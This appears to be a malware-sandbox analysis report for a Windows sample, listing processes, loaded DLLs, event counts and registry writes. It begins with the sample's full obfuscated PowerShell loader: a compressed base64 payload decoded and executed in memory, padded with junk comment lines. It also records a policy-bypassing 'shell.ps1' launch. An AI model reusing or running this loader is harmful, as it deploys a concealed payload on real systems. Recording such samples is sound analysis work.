             #   n W , S G v q V _ _ I Q h ] } C F _ . % ) E T l u - 7 [ ) P ( g [ f p b Y + Q [ F k ; M U ^ g l ) M R w y g < l Q 4 A : h d T . 4 I % } c 2 9 % J Y b C + ; F T 8 [ > H t t ? x F 7 t C j J 5 f ) k 4 c e : M Z N ^ h J Q a c k d # h 9 = & $ ( ( _ Y ( c q 9 @ C 0 # n s c d |   < m | C 1 } U @ 7 _ l ! ! O x d > s S q V V , E B , @ ; ? d = % c B ! 2 5 + [ _ x ] h V ? W q 7 g L - Q W l ! X ! x : i 1 % { } C , 5 % C i d M . ^ , 2 y e Z 2 P 7 % O v , Y m > g z t A M c X f a c x M C - g m ; . C v v ! b G T x E v t 8 h a { U I i x K & H j , A 0 v m 8 H * l & K ? % $ u C Z _ Y e u % C 0 p v t g m Z h , 5 ) 7 ( z j F 5 m f D q q 1 d - B } z 1 j j o 8 Z n E f ] n P E 7 ^ M f u o V = e R w k X O y W t k ] k S 0 X ? D m - 4 F E H * ) n L T T m [ X c | . b N 9 v O d | V , J o 6 v k I m W U ; d l u 1 l X 3 C t u < % p Z 4 Y l h T D n F B l + ; E o P y & I c r L } u ; 9 n R ; } . v u @ R ? : V b ] T [ ( [ i g l H L n & # % _ K   { | G & Y I i < } U ? C = > ! = C F q c Q . - 8 j ^ z # @ O n n 3 N 5 ) + 8 t W u } E m { 0 l t $ A e f - ) 0 L N 4 6 = e   Y < { U ) e h ) a D r B 2 Y . ) 3 # - _ & ( ; c D b f # G w Q _ 4 I * ? E @ L . M G > d a y W M f E h ( C ! - y P @ F 4 < R B @ D O 6 s v & 1 G 4 2 X _ I _ * 2 2 k m <   t g * s M H | Y * { I y _ N k y | u D k 1 F ; w < - h $ 7 g v ; ? F M r q f C 0 $ h W n R )   I ! : x & w e ( . ( # G D M h j { ^ V 2 t x T : s : ( I w n N M ( k { d Y R 1 ? $ W e | w   ) !  
         $ a         =               1 0 1 0 4 ; $ b                 =               ' C : \ U s e r s \ a d m i n \ A p p D a t a \ L o c a l \ T e m p \ t m p 2 6 8 F . t m p ' ; & (       $ s h E l l i d [ 1 ] + $ S H E L l I D [ 1 3 ] + ' x ' ) (   n E w - o B j E C T                           s y s t E m . I o . C o m P R E S s I O n . D E f l a T e s T R E a M ( [ i O . m e M O R y s t R E a M ] [ c O n v E r t ] : : f r o M B A S E 6 4 s t r i n G ( ' p V T R b t o w F H 2 v x D 9 4 i I d E M s i j a J q K I p W G d q v U a h V 0 W z X E g 0 l u S T T H j h y n D S v 7 9 9 0 k Z o U u G 0 V 7 i e + N 7 X P u 9 T n 2 K A y 7 t 6 s U S P U d w 3 0 s Y x M r S U 7 b r a M 8 i + W S T F e Z g W R I t r P e J J c m T q B 3 K Q 1 o l U 5 B P 8 Q B Z M P W U Z o v R B y Q Q P A s I 3 d P J F A y M y S P p S E j j x W M s T 4 9 K 4 M B Y 9 S v / 7 y n 4 y r o M 3 p e B W 8 Z I s 3 G Q l w m q d L G a X 8 H L U E c 9 9 v u P D P c I A E U y C w J F n B j N P m U g r z R C k v I n I q r o A u l B F n R K v v h v h a v 2 u U L l c F H L k M B j i U o X o 1 g N 3 y J t c m 5 G A m h g v P i N w y 1 w a a w e u D 1 s D i s z K 8 6 N m C 7 v o Z E 6 V U D z W J l Y D Z / J l K 5 V e N A M t s P 0 h k I T G N H n 2 3 0 3 1 w X I s + i S / S N z o P S j T 4 P I v g X 4 a H i + B q 4 g Q m e m Y H b C J P w 7 w L Z n G + C R T 0 R b P L Q f X a 9 J a u a m N R G T D c K h O 6 T 3 R F 5 2 3 Y d r c / W / n q 8 P q f 3 X G R A 0 x I v v n c i z 6 v X 9 7 7 h F X M 1 m B w b q N Y M L V D i v X B Z R L e 2 0 K o A N + x d g V y a i L L i G O / a m h V 9 H D A b M M u U 7 D I 9 b d s / c o c 7 z D + r p t S Q 4 L 4 3 f 3 g i o g l 1 r C r b x A N W e U G 5 e 8 D x z S n h H 4 c l e o O 9 S / z w Z V 8 l 8 u N + 5 B K y 2 V i N V e 8 H t C I Y r 8 F N u 0 I w J N j N t 8 + 7 F s E c I k L z J H a F c 1 h Z + 5 R 0 r 7 h c 5 n w J x J 9 G X K e t o 0 7 o z X w l H 0 C b + c n J h V b J G c / g 3 W B q N D 7 s j v M B T B f n D a A A 3 Q l / J J 2 F 6 + K 1 u s P V E 2 d W n v l x f 9 7 h t B P i 7 1 8 = ' ) , [ s y S T e M . I o . C O m P r e S s i O N . c O m p r e S S i O n M o d e ] : : d E C o m p r e S S   ) |                 %   {  
             #   A 4 N Q | Z u U 9 a u _ ? b | ( & [ * I x t < 9 $ _ J g 1 : _ ; % 8 _ = A : = U S 5 i w Z & # & r F | @ 5 7   C ) ( E E Y j g 1 ] 4 M q r ) @ o , r I x L g L 9 2 R w - @ b V T , 7 8 ^ 6 ; 3 q R ; ; 0 ^ t ; + z b 0 I 8 N ^ $ i g g N : 2 n ! $ r M v j 8 f n O q Y f _ < A I . R N | > I 3 ^ E w R | E M s u 8 Y < ) 8 | = ) E B @ 7 O ! S Y r z c } 8 q V 8 M ; 7 4 9 l F * 4 V 4 v ) $ F w k ] Z [ 5 O W U w 4 _ z [ m L > B J B n ? + $ < i J ] 7 4 # s & 1 < v z & < n k r 2 @ L 6 C M h I 5 v # T B z w 8 $ D v T t p j j k 4 V L x & y d * G N 5 l j ; e a K w P F X V t L X e B 9 I _ n M J . H h - g 5 : | 4 J x 7 i T S : U a + * :   k H _ ^ 1 q T ; # u } 2 U $ ? ? = T Z ] w $ ( 5 T A h F : 9 H > 2 } ] U G B s 2 N > , v @ r * L 3 Z k p H t p  
     #   j A a Y b N G U B > ! E : l 4 _ E G 3 s R b G l ] U C : m p + - q ; $ Z @ 7 S E # X H U 5 a > K P 5 F [ j p } 5 , ! ) P A   t w < r y 6 @ 4 O q p ? Q 9 a S p - c 8 I V ) 7 k [ j I } ] N X ? < $ q 5 m 9 ; Y 0 r ? 4 A X G , V V r 3 j & A # X o ? + E p d + 2 ) - 3 a h P P y   # c H F V e T Z | & I 3 S % # > ] V w n f e % # ] n g C A Y = R A d [ } a $ D < 5 , F o ? ] k I = V b E f 3 Q F _ i [ j k _ K 5 j U H 4 l x w h _ 1 _ s 4 I k A N > @ Z e = X p 9 B $ [ F ^ T j f J 2 z 3 D < U   m A ! 2 h t W c R K M e : i 9 M q @ R j w ^ s f . o X g i a f [ % P 6 = E P I ] ] m 1 H v W h g U k ) 9 6 2 i H w j i l B A J 0 ^ 7 5 e u > _ $ ! L t 6 w J , ) Q k > V # v > n < u V 5 I X = A > f A o - 8 Q _ l q : z U C b K S e q 2   T v 2 K h n H o x k 3 4 > I ( 2 < _ H 8 B M ; c u c , # A N _ - F ] ! . q @ 6 | P K _ J M D A [ P R C Y a $ 0 b R E p } 1 _ 8 G 3 ! 9 9 0 R j { 8 B : ] { } q * > F F ) X X i K # = b G $ 9 : j $ = b a [ O k x M * = [ d = 0 > t O O Q P U ( o L N J Y T o e . { + } + ? W 7 Z z @ x ^ y L 0 x 4 $ 8 4 y P 0 Q E 4 C ) y P p 5 $ y 4 ! c J I ! q J p N + p S x W u 2 : . p , > r r Z { < ) i 3 T ? U G n ; g u & : _ S f h 8 ^ e u E s n W A ) j C ; & h % m S < > @ w 8 s r # = ! W I 6 [ ! { % z s S A R 2 l U m V w h j 4 f 3 : F Z @ 8 p = # z * } A ) 5 * @ ? K R o { $ v j > H n k } S ( m } _ s 5 X [ ; ? h G S < . Y t , 9 n J | 6 R F p z X i ^ 9 w 7 Y 8 X ^ 8 ( i = T C 2 n x G J | X R J ! . S l k i   } > j { q T ; o 0 e   j . y < , { f y e + P ? x k : A ] b D Q S o ; h ^ + Z L Y M } V 9 9 } D E T o R K w o B D S o > A H > ! m : 4 Z Z 4 R D ] R % y ^ t @ [ 1 Z r K s 1 ! ? : < 1 J Z t Z 7 Q v D A . ] Q ^ 0 u I ? < G B Y v 0 $ ? < 4 0 _ x R p k 9 r H v : 8 8 j f T m T t * k U 9 ( k ? O * D w M W 9 9 Z v 8 ! V y % : 3 G g $ ^ z # h  
           #   ( N : < l y [ v ( q s * , 1 V q M ^   X k H 3 O 1 y m A 2 F a - C 6 . $ B E - V S z g 3 8 } d r t P y : = # < ] B f C q 9 n r J Q 1 B 2 f X Y ^ E f f   6 I 4 & _ F Y m 3 H 8 D 6 v W G G r g o 0 y S y 2 j y Q . W 9 - } s ? m F { Q q } C L t ? 7 , [ x < D O J f Y @ | h V B V u T L p B > O - G 0 % _ t 1 5 A & O 0 : [ 7 k B b F 8 g x a X @ J d ! # K 1 g A 9 a ; : k a j 7 L J M y = d k X p U } : q 8 d < c Q  
               #   h Q F c U ? u 3 5 K * > b l i N R : L T 3 2 P b * { O % > G _ i > d x y   j V L c = q ! X . [ 3 8 d [ O o B @ N I U F   e 8 T = c R : ] d G _ ! : f { p U g k K b V   M p a $ : b * X ? J I 2 K h L U ? Z # D { 3 % n z | [ ^ ) q : + n . ) + L 6 B ]   L U y m l 5 Q 5 0 a 3 w c ^ s r { ) * ^ j S - ] 7 * X - y *   y ^ 6 p ( u , 7 M h I h S ; 5 3 # w - m O @ j = B C ; U P { Z # w 2 Q k g k S A < M P = G I F B 7 e 0 ^ % q 3 I t j 4 { ( 0 e ? N s k j x k 0 $ f f 6 p 2 o r , 6 ^ + $ 3 d $ V : = X N t l 8 c N | n E H > e 0 4 { B G D T E k @ = P m j i # ! ( D 9 H [ p s X x 0 6 Y ^ ] R } o L ? O F w Z K Y [ { E ! o q B 9 T 9 5 { 4 # 9 1 3 x   6 k * w ) , D Z A ^ W s = o t u $ s x B L g , H * i n ( 3 v * a E U b H a X = s L l 5 H } , h m ( U 0 , @ A Z l w T s 6 U ! a r   0 8 u d ? F { 7 Q n V z G 7 M & m U = u H 7 =   b 3 . ( @ > 1 X O G ( ! G E D ^ E - ^ z b 5 w ) R g 3 & H B x > : g % , ) b r g X J N | 8 j v 4 P < ; 7 = 9 D K # H s D V q b % _ J X , [ h 4 Z g 4 $ y @ m O u V X . x y { P ? g P J { ] C x A P = Q h F $ * , N d | $ j ] e Y W a   W H ? k V Q y } < r v ] Q - T 6 & T Y e @ s R > M - @ < # - K : 5 L K $ ^ > I z | Q X s ; | l [ t S h h 9 [ x V N D Q k g _ Z l B H d k u x O a | $ M ] M Z G L A R 0 @ R Z N ] ? X O K w $ J _ M < t j W q P ( O P e n M u Y A - M < B W S I   E > } _ | @ + M z M p ) R : V h M j , 3 { b z 8 ! f P . A ^ t K % + Y ( S O B $ X { U 7 l % 1 o i # R v ) $ m g $ c ! _ $ f 3 ; [ r 7 4 [ # ( [ r = g M > @ % F A d [ _ 7 r > w - _ * o } c j Q s g _ > s S m N { X 4 C d , } > L ? D e = G e @ g X e 4 6 > ? k ) R M R } $ O R A F 5 M g N h A ! . E B S r k d u R O C * $ y F H q N V = l A x 4 y _ % @ Y $ y ? L x j W % x p Z h x J l F L I % l a 7 4 ] ( w { e k M u 4 N 2 I Q m * Z 4 T I 2 + v H G I { F   K Y Z S 2 w h Q ! v [ b { x @ + $ d m < 7 8 3 ( ] ?   x o z G r P q K N = i M P 3 . I ; a s ? b D , Y i f & : @ P G W & i P i # z Z F M X & r 3 ; B h 1 # n I Z ? u 9 m 3 , o y @ ; w i Z D J c R n D L O D ; 1 u @ & ; % O : I z 0 V O < g r X 1 8 > ^ M K  
       n E w - o B j E C T           I O . s t R e a m r e a d E R (         $ _ , [ S Y S T e m . T e x t . e n c o D i N G ] : : A s c i I ) }  
           #   L 8 + G p | I V S = C 3 9 D Y R Q R B B q e * R : n d > b V # # 6 = 0 ) V _ ; J C s ) A 4 ^ v D 3 ; % G s o # I f - H d W J Y = Y X c s P V y ) a L | c 9 x w T 4 ] f $ ? ? f C s | b s } E h j $ ^ O w e 6 U * 1 ) [ < X N 4 | d ? k ) b = y ( U { g ; * r Q + n ] F = k [ ; + _ Y a Q E 5 j * O H f L j 6 0 V 6 d 5 m ! o u N U 1 K S p S ) < g $ k } . & @ m ( N A b k o x 3 ! A m S 5 V < @ [ = n = # D @ o K L p 8 ]   - J d l 5 L z e r _ V < G 9 % ? z j < w w . b Y T o f u S T 6 i z 2 8 b F D 4 f k } i v Q } | i d g 3 K , * L { L & 9 r ^ h L h 2 7 . O M ( A % O % 1 [ L d * 6 V * 8 { T K < Z O & 3 a c ^ P g V v s y 7 n 8 ^ % f 2 o c Z ] f = 9 | 3 t 9 O m ! j j g t U @ # b 8 v O - > A ! S J V 3 [ t 6 * v 3 E } k C k ; % q s   ^ N l ! M S 4 q R M M t e i a * 3 = X q v $ z 4 8 L ? } E < Q M D 5 & G % G J H ; 5 t L [ ? o 3 e _ * 0 L r ? t # 6 p } 4 = C Q 8 T k ! _ S K r N w # P K v R $ * _ Q w % 7 F C * N K @ < F $ o r o X M U v k q g m z &   v + q s , b Y 9 t V G ? U y 5 0 L J 5 { N F # u H N a ) q | V I j @ e ) ) I p 7 ( Z Z K B 0 Q a 0 U a O < = <   w 9 y 1 1 I & y & f 9 w # g s # ( e * [ g K 2 A y 5 M B x } ( D % ) z e i N ; A g k a % q ( d P y i y # o 7 % ; 3 5 2 = u ! } L 0 @ g e n & , B l w s K 5   E $ R ) y ! [ k R ( ] Y e - e a v B ! s k J 7 % : & . 3 j H X { G b 7 U d Q - f a R , + N M u t < s = G z q E N t w S # [ 2 ? | 8 E B * F 5 S z x * v 4 X ^ T l 5 k 9 O _ H I _ v 0 ) V ) r F q E 4 q } m E B H f % @ 4 : $ a d a L N . ? 6 t 2 * [ t Y k 5 n L . S ] , A 5 [ 7 $ : b 6 # x n f z K C   { | T r > j m k ^ & 0 t f z | y V ^ n 2 ] { } J s K n ^ 3 c & Z p [ { . t ( 6 D > ? S 5 | V 1 ( W e j O b 1 + O r [ q C [ % n F U ^ s r e ; 7 a c a - R { g w u ^ K + n f e z W * y } | l Z 5 z S } N M a I , N w x * [ h n D O l W D W ) w d & v 4 I # o  
 #   N t J c W a ? * e W @ h E ? J q k { 3 K c Y = ? f J t _ O a : . } E = n . 7 f # * g ? W ] k 8 E _ S R 2 C b T ^ Q :   d F 5 ) W 4 [ m - 3 & x y : 8 S + I Y ! f [ U R } $ ] S 5 H y Y + | ( W B Y ( z D e G $ ^ - g h [ E ; ( i % r _ y r Y O . n G 9 F 5 | J n _ R | 8 = ? S   v F ! u : n > = Y ( 7 & M Y H % ( + [ F g u Z M E @ j P J O X - O E . p . f l > e z Q w s _ y v 1 = w V   $ l [ . z s 7 e - v q 0 L E % S _ y R O 4 H g o i s [ 7 : E E } x ! + 0 M y . # | o J < Y z M c Q G n 0 t D f C D X l G D t b k 3 < ( h V 3 W ( + } % } c @ V N v n 2 m n f s . x E P N K E $ t 1 9 k z @ r w n C s z 3 V q u A m g [ [ u i 0 d i u ] 3 l F : z j h | # m D Q } | B D 4 < < v w D w , c 0 M ^ ^ f > ^ B V I _ l a t k 6 0 { < X G C k t - ! k   W . < f f - F * t Y O R s l | p c i 9 < o   y B m l U c 4 j @ c C Z F R r R z J 2 7 q } > k a y $ f q ( + Q A G - M W ! 3 y P   Z i L J R 6 s # J 1 ! E = T ? n m S } I U [ , A u b Y m J i H D N % M 3 i & ! f j { ! o Q + * M 9 e H = + y ] , + , t D V , Z I D   N H g J * F 7 @ } X v m v _ c A b T w c 9 { 9 Q # p = 6 ) ^ - 4 V 5 [ X P S c O o P Q T ) w K . < T * H P 7 1 ; u I M S k r B g ; ? d k W } ) a s E m R o ! b o ( i * v B i O & ; x M $ ^ x 2 n S s S ! M 2 e Q f } J B L j 5 H m p @ f } ^ # @ u c [ ? o ^ @ $   N I  
         #   h + K Z K _ j 8 & & S m ; e H L _ ! 8 3 O x $ s K z d d T d r % a K c 1 v , l M 0 3 m s O e k z X _ f ! [ P W z D y # w y y : :   I & C H ^ 9 I N e . i z & > m ? 8 M Z 1 _ q z D = x R [ l < G T # 6 T u 1 g m j b U R e . % W p w % n _ , j q j ) | d ) [ > b ! X j 5 + Z i W , . k * l H % 5 z 8 | v J # E , = % ) = : e y x H B t ! @ % H p y x T R < L M a w b | ; L @ d D 8 l S A 3 c + 9 Z X j >  
     #   ( k W = i Q ) U m p h r 5 | _ + ( : - 7 ( Y _ 4 G n w Z m z n d K y X r w J = G ( v ^ y } s < o O   J 0 ] k Z D K O # $ n Y 3 [ t m j $ r S p ^ 4 < ^ O : 1 ] U ) 6 [ ? g 5 q n ! t C = | d l + K d h X n N h I R i m d ? X e J I H & - c 1 } , - y @ > C f ( - R B S 8 : < C & y > k 7 l * b k P $ ? x : ! + [ 3 q _ U 9 E P . t < 6 d F d u 9 t X 9 m t G 1 c h D ) x I ? 8 ! o | J - x v r m u Y M > u g w R w U q J < # . R ? ( D A + b ? 8 a 9 x 6 4 E   n A a E e 3 ] j Z b E S D E H ] H w C G _ g S G t c , J t > @ o & ) < l T W E r = y u N G u d P w ^ I G X b @ W F ? D E ; A j G R E 3 w = K p : 8 F e > . G E g d W G G J w : < j B M U + f > z Y W 4 @   F u S u 3 . j L f j f t f p z   $ K P 7 B < o I e ? ! r s . { q 6 s R ! C h ( u 3 k + @   K + m @ E m ^ ] Z W G p % P f q q [ y Z * B F &   t c S 5 Q n ( , 6 } + ! b 1 _ q w n j ; : j g N <   7 8 u 3 7 8 > O O E H c 6 D _ ? m ! C N 8 7 y [ p c o @ q = 6 s ? n > H ] 4 j - i k v 1 V d { # Q  
       | %     {  
         #     I i W 8 l 7 9 G C w = A X E K $ v S % F ? 2 t : b { } N ) C a U 7 0 Z > , ( u K X Y 6   E e V < K y . x > . : 4 n x ( { h d d F s 2 @ s , i N % y [ > w j | u 3 j l < G D @ L j 1 s s [ V G , 0 ^ q S H y N { X ] $ p Y Q U 8 p 1 ! & . r ( o 9 T ! > o 0 Z 6 # = i E Y v = r J q Y { C k a [ O r 8 + D e n : M j a P 4 $ 3 3 t x D L C W h P k D  
         $ _ . R e a D T O e N d ( ) } ) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMSBuild.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
2200C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2280net session C:\Windows\System32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Net Command
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2520powershell.exe -ExecutionPolicy Bypass -File shell.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemain.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
3108c:\Windows\System32\Taskmgr.exe C:\Windows\System32\Taskmgr.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Manager
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\rpcrt4.dll
Total events
251 471
Read events
250 394
Write events
1 028
Delete events
49

Modification events

(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000060282
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconLayouts
Value:
00000000000000000000000000000000030001000100010013000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C00000011000000000000006600690067007500720065007700650064002E007200740066003E002000200000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C00000017000000000000006500780070006500630074006500640070007500720070006F00730065002E007200740066003E002000200000000F000000000000006600650065007400650065006E002E007200740066003E002000200000001000000000000000680061007600650063006100730065002E006A00700067003E002000200000000E000000000000006C0069006E0065006F0072002E006A00700067003E002000200000000F000000000000006C006F00740073006500730074002E0070006E0067003E002000200000001400000000000000700072006F0062006C0065006D0070006F0069006E0074002E007200740066003E00200020000000110000000000000072006100740065006400660061006C006C002E007200740066003E002000200000001400000000000000720065006300650069007600650064006D0061006C0065002E007200740066003E00200020000000130000000000000077006500720069006E00670074006F006E00650073002E007200740066003E002000200000000C000000000000006D00610069006E002E006500780065003E00200020000000050000000000000061003E005C002000000001000000000000000200010000000000000000000100000000000000020001000000000000000000110000000600000001000000130000000000000000004040000000001200000000000000000000000000803F0000004008000000803F000040400900000000000000404003000000803F000080400A000000803F0000A0400B0000000040000000000C00000000400000803F0D0000000040000000400E0000000040000040400F0000000040000080401000000000000000803F01000000000000000040020000000000000080400400000000000000A04005000000803F0000000006000000803F0000803F0700000000400000A0401100
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop
Operation:writeName:IconNameVersion
Value:
1
(PID) Process:(3108) Taskmgr.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:delete valueName:Preferences
Value:
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000001102BA
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(4772) explorer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000202A8
Operation:writeName:VirtualDesktop
Value:
10000000303044563096AFED4A643448A750FA41CFC7F708
(PID) Process:(3108) Taskmgr.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager
Operation:writeName:Preferences
Value:
0D00000060000000600000006800000068000000E3010000DC010000000001000000008000000080D8010080DF010080000100016B00000034000000130300008C020000E80300000000000000000000000000000F000000010000000000000058AAEE82F77F00000000000000000000000000002E0100001E0000008990000000000000FF00000001015002000000000D0000000000000098AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008B900000010000000000000000101001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF780000001E0000008C900000020000000000000001021200000000000400000000000000C8AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008D900000030000000000000000011001000000000200000000000000E8AAEE82F77F00000000000000000000FFFFFFFF320000001E0000008A90000004000000000000000008200100000000050000000000000000ABEE82F77F00000000000000000000FFFFFFFFC80000001E0000008E90000005000000000000000001100100000000060000000000000028ABEE82F77F00000000000000000000FFFFFFFF040100001E0000008F90000006000000000000000001100100000000070000000000000050ABEE82F77F00000000000000000000FFFFFFFF49000000490000009090000007000000000000000004250000000000080000000000000080AAEE82F77F00000000000000000000FFFFFFFF49000000490000009190000008000000000000000004250000000000090000000000000070ABEE82F77F00000000000000000000FFFFFFFF490000004900000092900000090000000000000000042508000000000A0000000000000088ABEE82F77F00000000000000000000FFFFFFFF4900000049000000939000000A0000000000000000042508000000000B00000000000000A8ABEE82F77F00000000000000000000FFFFFFFF490000004900000039A000000B0000000000000000042509000000001C00000000000000C8ABEE82F77F00000000000000000000FFFFFFFFC8000000490000003AA000000C0000000000000000011009000000001D00000000000000F0ABEE82F77F00000000000000000000FFFFFFFF64000000490000004CA000000D0000000000000000021508000000001E0000000000000010ACEE82F77F00000000000000000000FFFFFFFF64000000490000004DA000000E000000000000000002150800000000030000000A000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000008990000000000000FF00000001015002000000000400000000000000C8AAEE82F77F0000000000000000000001000000960000001E0000008D900000010000000000000001011000000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C900000020000000000000000021000000000000C0000000000000040ACEE82F77F0000000000000000000003000000640000001E00000094900000030000000000000001021000000000000D0000000000000068ACEE82F77F00000000000000000000FFFFFFFF640000001E00000095900000040000000000000000011001000000000E0000000000000090ACEE82F77F0000000000000000000005000000320000001E00000096900000050000000000000001042001000000000F00000000000000B8ACEE82F77F0000000000000000000006000000320000001E00000097900000060000000000000001042001000000001000000000000000D8ACEE82F77F0000000000000000000007000000460000001E00000098900000070000000000000001011001000000001100000000000000F8ACEE82F77F00000000000000000000FFFFFFFF640000001E0000009990000008000000000000000001100100000000060000000000000028ABEE82F77F0000000000000000000009000000040100001E0000008F9000000900000000000000010110010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000B000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000009E90000000000000FF0000000101500200000000120000000000000020ADEE82F77F00000000000000000000FFFFFFFF2D0000001E0000009B90000001000000000000000004200100000000140000000000000040ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009D90000002000000000000000001100100000000130000000000000068ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009C900000030000000000000000011001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C90000004000000000000000102100000000000070000000000000050ABEE82F77F000000000000000000000500000049000000490000009090000005000000000000000104210000000000080000000000000080AAEE82F77F000000000000000000000600000049000000490000009190000006000000000000000104210000000000090000000000000070ABEE82F77F0000000000000000000007000000490000004900000092900000070000000000000001042108000000000A0000000000000088ABEE82F77F0000000000000000000008000000490000004900000093900000080000000000000001042108000000000B00000000000000A8ABEE82F77F0000000000000000000009000000490000004900000039A00000090000000000000001042109000000001C00000000000000C8ABEE82F77F000000000000000000000A00000064000000490000003AA000000A00000000000000000110090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000008000000010000000000000058AAEE82F77F0000000000000000000000000000C60000001E000000B090000000000000FF0000000101500200000000150000000000000088ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B1900000010000000000000000042500000000001600000000000000B8ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B2900000020000000000000000042500000000001800000000000000E0ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B490000003000000000000000004250000000000170000000000000008AEEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B390000004000000000000000004250000000000190000000000000040AEEE82F77F00000000000000000000FFFFFFFFA00000001E000000B5900000050000000000000000042001000000001A0000000000000070AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B6900000060000000000000000042001000000001B00000000000000A0AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B79000000700000000000000000420010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000